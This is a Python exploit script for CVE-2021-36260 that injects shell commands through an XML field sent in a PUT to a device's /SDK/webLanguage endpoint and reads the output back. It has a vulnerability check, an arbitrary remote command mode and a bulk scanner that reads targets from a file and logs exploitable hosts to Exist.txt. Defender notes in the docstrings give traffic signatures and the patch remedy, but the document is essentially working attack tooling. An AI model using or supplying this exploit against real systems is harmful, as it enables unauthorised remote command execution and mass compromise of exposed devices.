# -*- coding: utf-8 -*-

import argparse
import time
import requests
from pyfiglet import Figlet

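def check_host(host):
    """Return True when *host* carries an explicit http:// or https:// scheme.

    The previous prefix test (``startswith("http")``) also accepted strings such
    as ``httpfoo`` that have no scheme separator at all; the check now requires
    the full ``http://`` or ``https://`` prefix. On rejection the same red error
    line is printed and False is returned.
    """
    # str.startswith accepts a tuple, so both schemes are tested in one call.
    if host.startswith(("http://", "https://")):
        return True
    print('\033[1;31m[x] ERROR: Host "{}" should start with http or https\n\033[0m'.format(host))
    return False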

def Req(url,command='>webLib/cu'):
    """Issue the two requests this script uses for CVE-2021-36260 and return the second response.

    A PUT to ``/SDK/webLanguage`` carries an XML body whose ``<language>``
    element wraps *command* in ``$(...)``; a GET for ``/cu`` follows, and its
    response object is what the caller receives. Any exception is printed and
    the function then returns None implicitly.

    Defender view of the traffic built here: a PUT to ``/SDK/webLanguage`` whose
    body contains ``$(`` inside ``<language>``, followed by a GET for ``/cu``,
    sent with the fixed Chrome/98 User-Agent and ``X-Requested-With`` header
    below. These are usable as log/IDS match criteria; the remedy for the CVE
    itself is the vendor's fixed firmware and keeping the device web interface
    off untrusted networks.
    """
    try:
        # url is rebound to the text after the first '//'; host and port are
        # then taken from around the first ':' (an input without both pieces
        # raises IndexError, which the except below prints).
        url = url.split('//')[1]
        host = url.split(':')[0]
        port = url.split(':')[1]
        # Fixed header set: every request from this script carries the same
        # browser-like User-Agent and AJAX marker.
        headers = {
            "host": f'{host}:{port}',
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
            'Accept': '*/*',
            'X-Requested-With': 'XMLHttpRequest',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8'
        }
        # *command* is interpolated into the XML without any escaping.
        data = '<?xml version="1.0" encoding="UTF-8"?>' \
                     f'<language>$({command})</language>'
        # The request body is echoed to stdout before sending.
        print(data)
        # verify=False turns off TLS certificate validation for the PUT;
        # resp1 is assigned but never inspected.
        resp1 = requests.put(url=url+'/SDK/webLanguage', headers=headers, data=data, timeout=3,verify=False)
        # The follow-up GET passes no headers, timeout or verify arguments.
        resp2 = requests.get(url+'/cu')
        return resp2

    except Exception as e:
        # Broad catch: the error is printed only, so callers receive None.
        print(e)


def check(url):
    """Report whether the Req() probe against *url* ended in an HTTP 200.

    Prints a one-line verdict and returns True for status 200, False for any
    other status. The response from Req() is used without a None check.
    """
    resp = Req(url)
    verified = resp.status_code == 200
    if not verified:
        print(f'[-] Could not verify {url} if vulnerable (Code: {resp.status_code})')
    else:
        print(f'[!] {url} is verified exploitable')
    return verified


def cmd(url,cmd):
    """Pass *cmd* to Req() with its output redirected to ``webLib/cu`` and print the reply body.

    An error line is printed when Req() returned None or a non-200 status;
    the response text is printed afterwards in either case.
    """
    redirected = cmd + '>webLib/cu'
    resp = Req(url, command=redirected)
    succeeded = resp is not None and resp.status_code == 200
    if not succeeded:
        print(f'[!] Error execute cmd "{cmd}"')
    print(resp.text)

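def main():
    """Parse the command line and run a single-URL or file-driven check.

    With ``-u`` the URL is validated by check_host() and then handed to
    check() (``--check``) or cmd() (``--cmd``). With ``-f`` each line of the
    file is stripped, validated and checked; URLs for which check() returns
    True are appended to ``Exist.txt`` in the current working directory, with
    a 0.2 s pause between lines.

    Changes from the earlier version: the target list is read through a
    context manager so its handle is closed (it was previously left open),
    the builtin ``all`` is no longer shadowed, and the banner object and the
    file handle no longer share the name ``f``.
    """
    banner = Figlet(width=2000)
    print(banner.renderText("Cuerz"))

    parser = argparse.ArgumentParser(description='CVE-2021-36260')
    # Printed unconditionally, before the arguments are parsed.
    print('Example: CVE-2021-36260.py -u http://192.168.1.1:8080 --check')

    parser.add_argument("-u", "--url", help='Start scanning url')
    parser.add_argument("-f", "--file", help='read the url from the file')
    parser.add_argument("--check", required=False, default=False, action='store_true',help='Check if vulnerable')
    parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: "ls -l")')
    args = parser.parse_args()

    if args.url and check_host(args.url):
        if args.check:
            check(args.url)
        elif args.cmd:
            cmd(args.url,args.cmd)

    elif args.file:
        # The context manager closes the list file even if a check raises.
        with open(args.file, "r") as targets:
            for line in targets:
                url = line.strip()
                if check_host(url):
                    if check(url):
                        # Append mode: results accumulate across runs.
                        with open('Exist.txt', 'a+') as fp:
                            fp.write(url + '\n')
                time.sleep(0.2)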



# Run the command-line interface only when executed as a script, not on import.
if __name__ == "__main__":
    main()
